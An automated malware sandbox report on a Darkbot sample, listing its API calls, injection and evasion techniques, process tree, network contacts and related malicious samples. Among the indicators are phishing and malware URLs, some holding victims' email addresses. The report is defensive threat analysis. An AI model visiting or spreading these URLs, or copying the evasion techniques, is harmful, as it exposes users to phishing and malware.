            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,15_2_0031B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,16_2_0038B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,17_2_0010B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,18_2_0010B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,19_2_0022B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,20_2_0032B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,21_2_0051B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,22_2_0019B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,23_2_0084B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,25_2_0040B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,26_2_0082B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,27_2_0009B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,29_2_005DB480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,30_2_0009B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,31_2_0091B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,32_2_0039B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,33_2_0009B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,34_2_0022B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,35_2_0015B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,36_2_007FB480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,37_2_0025B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,38_2_0026B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,39_2_003FB480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,40_2_003FB480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,41_2_0028B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,42_2_0010B480
Source: C:\Users\user\Desktop\25F.tmp.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\25F.tmp.exe  Code function 4_2_0036E880: memset,lstrlenA,_snprintf,CreateNamedPipeA,CreateNamedPipeA,CloseHandle,ConnectNamedPipe,GetLastError,CreateThread,CloseHandle,CreateNamedPipeA
Source: C:\Users\user\Desktop\25F.tmp.exe  Code function 4_2_00361AD0: GetSystemTimeAsFileTime
Source: C:\Users\user\Desktop\25F.tmp.exe  Code function 0_2_00604C91: GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId
Source: C:\Users\user\Desktop\25F.tmp.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Tactics and the techniques the report marks with a signature count (the number in parentheses is the count shown in the report; the other cells of the report's matrix are unmarked template entries):

Reconnaissance: none marked
Resource Development: none marked
Initial Access: Replication Through Removable Media (1)
Execution: Native API (31)
Persistence: Bootkit (2); DLL Side-Loading (1)
Privilege Escalation: Access Token Manipulation (1); Process Injection (713); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (11); Access Token Manipulation (1); Process Injection (713); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); Bootkit (2); Software Packing (1); DLL Side-Loading (1)
Credential Access: Credential API Hooking (1)
Discovery: System Time Discovery (1); Security Software Discovery (11); Virtualization/Sandbox Evasion (11); Process Discovery (2); Peripheral Device Discovery (11); File and Directory Discovery (3); System Information Discovery (125)
Lateral Movement: none marked
Collection: Credential API Hooking (1); Archive Collected Data (1); Browser Session Hijacking (1)
Command and Control: Encrypted Channel (21); Ingress Tool Transfer (3); Non-Application Layer Protocol (2); Application Layer Protocol (3)
Exfiltration: none marked
Impact: none marked
Behavior Graph ID: 1582673  Sample: 25F.tmp.exe  Startdate: 31/12/2024  Architecture: WINDOWS  Score: 100

Sample-level signatures: Antivirus / Scanner detection for submitted sample; Yara detected Darkbot; Machine Learning detection for sample; 4 other signatures

25F.tmp.exe (started)
  signatures: Detected unpacking (creates a PE file in dynamic memory); Found evasive API chain (may stop execution after checking mutex); Found evasive API chain (may stop execution after checking system information); 7 other signatures
  25F.tmp.exe 1 (started)
    signatures: Injects a PE file into a foreign processes
    25F.tmp.exe 3 (started)
      signatures: Changes memory attributes in foreign processes to executable or writable; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
      QgGhoOpxHPl.exe (injected)
        signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Found direct / indirect Syscall (likely to bypass EDR)
      QgGhoOpxHPl.exe (injected)
      WmiPrvSE.exe (injected)
      31 other processes
        iexplore.exe 9 45 (started)
          iexplore.exe 49 (started)
            DNS/IP: code.jquery.com 151.101.2.137, 443, 49180, 49181 FASTLYUS United States
            DNS/IP: sb.scorecardresearch.com 18.244.18.38, 443, 49174, 49175 AMAZON-02US United States
            4 other IPs or domains
    notepad.exe (started)

Source        Detection   Scanner          Label
25F.tmp.exe   100%        Avira            TR/Injector.VS
25F.tmp.exe   100%        Joe Sandbox ML
No Antivirus matches (reported for each of the remaining scan sections)
Name                          IP              Active    Malicious   Antivirus Detection   Reputation
code.jquery.com               151.101.2.137   true      false                             high
sb.scorecardresearch.com      18.244.18.38    true      false                             high
assets.msn.com                unknown         unknown   false                             high
www.msn.com                   unknown         unknown   false                             high
c.msn.com                     unknown         unknown   false                             high
browser.events.data.msn.com   unknown         unknown   false                             high
Name   Malicious   Antivirus Detection   Reputation
https://sb.scorecardresearch.com/b2?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null   false   high
https://code.jquery.com/jquery-3.6.3.min.js   false   high
https://sb.scorecardresearch.com/b?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null   false   high
Name   Source   Malicious   Antivirus Detection   Reputation
https://www.msn.com/?ocid=iehp   {E68EA6F6-C74D-11EF-8F38-ECF4BBB5915B}.dat.6.dr, ~DF854EA4F5FD60E78B.TMP.6.dr   false   high
http://api.wipmania.com/   QgGhoOpxHPl.exe, 0000002A.00000002.620410514.0000000000100000.00000040.00000400.00020000.00000000.sdmp   false   high
https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.js   YJ1BHFNR.htm.24.dr   false   high
https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.js   YJ1BHFNR.htm.24.dr   false   high
https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.js   YJ1BHFNR.htm.24.dr   false   high
https://www.msn.com/fr-ch/actualite/other/Mentions-lexperience.b374b0d5b40196862f17[1].js.24.dr (URL and source file name run together in the export)   false   high
https://www.msn.com/favicon.ico   imagestore.dat.24.dr   false   high
IP              Domain                     Country         ASN     ASN Name     Malicious
151.101.2.137   code.jquery.com            United States   54113   FASTLYUS     false
18.244.18.38    sb.scorecardresearch.com   United States   16509   AMAZON-02US  false
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1582673
                                            Start date and time:2024-12-31 09:03:44 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 23s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:10
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:33
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:25F.tmp.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@13/38@6/2
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 57
                                            • Number of non-executed functions: 400
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                            • Excluded IPs from analysis (whitelisted): 184.28.89.167, 204.79.197.203, 23.72.248.199, 23.72.248.211, 23.72.248.200, 23.72.248.206, 23.72.248.210, 23.72.248.201, 23.72.248.204, 23.72.248.198, 23.72.248.207, 13.107.5.80, 2.22.251.24, 2.22.251.30, 2.22.251.41, 2.22.251.22, 2.22.251.42, 2.22.251.23, 2.22.251.40, 2.22.251.35, 2.22.251.25, 184.86.251.19, 184.86.251.9, 184.86.251.21, 184.86.251.22, 184.86.251.27, 184.86.251.7, 184.86.251.13, 184.86.251.20, 13.74.129.1, 20.42.65.85, 13.107.21.237, 204.79.197.237, 152.199.19.161
                                            • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com.edgekey.net, c-msn-com-nsatc.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ie9comview.vo.msecnd.net, api.bing.com, a-0003.a-msedge.net, onedscolprdeus05.eastus.cloudapp.azure.com, www-msn-com.a-0003.a-msedge.net, r20swj13mr.microsoft.com, www-www.bing.com.trafficmanager.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e-0001.e-msedge.net, go.microsoft.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, c.bing.com, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.net, global.asimov.events.data.trafficmanager.net, e28578.d.akamaiedge.net, api-bing-com.e-0001.e-msedge.net, cs9.wpc.v0cdn.net
• Not all processes were analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time       Type              Description
03:04:47   API Interceptor   87x Sleep call for process: 25F.tmp.exe modified
03:04:50   API Interceptor   12328x Sleep call for process: QgGhoOpxHPl.exe modified
03:05:17   API Interceptor   1x Sleep call for process: WmiPrvSE.exe modified
Match   Associated Sample Name / URL   Detection   Threat Name   Context

151.101.2.137
  http://novo.oratoriomariano.com/novo/   malicious   Unknown   context: code.jquery.com/jquery-3.3.1.min.js
  http://facebooksecurity.blogspot.dk/   malicious   Unknown   context: code.jquery.com/jquery-1.7.min.js
  http://soporte-store.info/icloud2022-esp.php   malicious   Unknown   context: code.jquery.com/jquery-1.11.3.min.js
  http://applela.za.com/isignesp.php?id=   malicious   Unknown   context: code.jquery.com/jquery-1.11.3.min.js
  http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/   malicious   Unknown   context: code.jquery.com/jquery-1.9.1.js
  http://awqffg.newburuan2023.biz.id/next.php   malicious   HTMLPhisher   context: code.jquery.com/jquery-1.10.2.min.js
18.244.18.38
  WSock.dll   malicious   Ramnit
  Unlock_Tool_v2.6.5.exe   malicious   Stealc, Vidar
  file.exe   malicious   PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
  file.exe   malicious   Amadey, Stealc, Vidar
  file.exe   malicious   Amadey, Stealc, Vidar
  file.exe   malicious   Amadey, Stealc, Vidar
  file.exe   malicious   PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar
  ArenaWarsSetup.exe   malicious   Unknown
  file.exe   malicious   Amadey, Stealc, Vidar
  file.exe   malicious   Amadey, Stealc, Vidar
Match   Associated Sample Name / URL   Detection   Threat Name   Context

code.jquery.com
  https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com   malicious   HTMLPhisher   context: 151.101.130.137
  https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com   malicious   Unknown   context: 151.101.2.137
  EFT Payment_Transcript__Survitecgroup.html   malicious   Unknown   context: 151.101.2.137
  http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h   malicious   HTMLPhisher   context: 151.101.66.137
  Hwacaj.exe   malicious   Darkbot   context: 151.101.66.137
  http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h   malicious   HTMLPhisher   context: 151.101.66.137
  http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUMFBJSDkxQ0w3VVZMNFJFUlNDRVkyU05CUi4u   malicious   HTMLPhisher   context: 151.101.130.137
  phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.eml   malicious   Unknown   context: 151.101.2.137
  https://contractnerds.com/   malicious   Unknown   context: 151.101.194.137
  http://booking.extranetguests.com/   malicious   CAPTCHA Scam ClickFix   context: 151.101.194.137
sb.scorecardresearch.com
  BHgwhz3lGN.exe   malicious   Vidar   context: 18.244.18.122
  Tool_Unlock_v1.2.exe   malicious   Vidar   context: 18.161.69.30
  Hwacaj.exe   malicious   Darkbot   context: 18.161.69.8
  JA7cOAGHym.exe   malicious   Vidar   context: 18.161.69.117
  aD7D9fkpII.exe   malicious   Vidar   context: 18.165.220.110
  installer.bat   malicious   Vidar   context: 18.165.220.106
  skript.bat   malicious   Vidar   context: 18.165.220.66
  din.exe   malicious   Vidar   context: 18.165.220.66
  lem.exe   malicious   Vidar   context: 18.165.220.57
  HVlonDQpuI.exe   malicious   Vidar   context: 18.244.18.32
Match   Associated Sample Name / URL   Detection   Threat Name   Context

AMAZON-02US
  chernobyl.arm7.elf   malicious   Gafgyt, Mirai   context: 54.171.230.55
  DIS_37745672.pdf   malicious   KnowBe4, PDFPhish   context: 34.241.139.243
  ARMV7L.elf   malicious   Mirai   context: 54.247.62.1
  systempreter.exe   malicious   AsyncRAT   context: 3.69.157.220
  http://ghostbin.cafe24.com/   malicious   Unknown   context: 13.32.99.103
  rjnven64.elf   malicious   Mirai   context: 54.171.230.55
  https://gogl.to/3HGT   malicious   CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT   context: 18.245.31.129
  Epsilon.exe   malicious   Unknown   context: 185.166.143.48
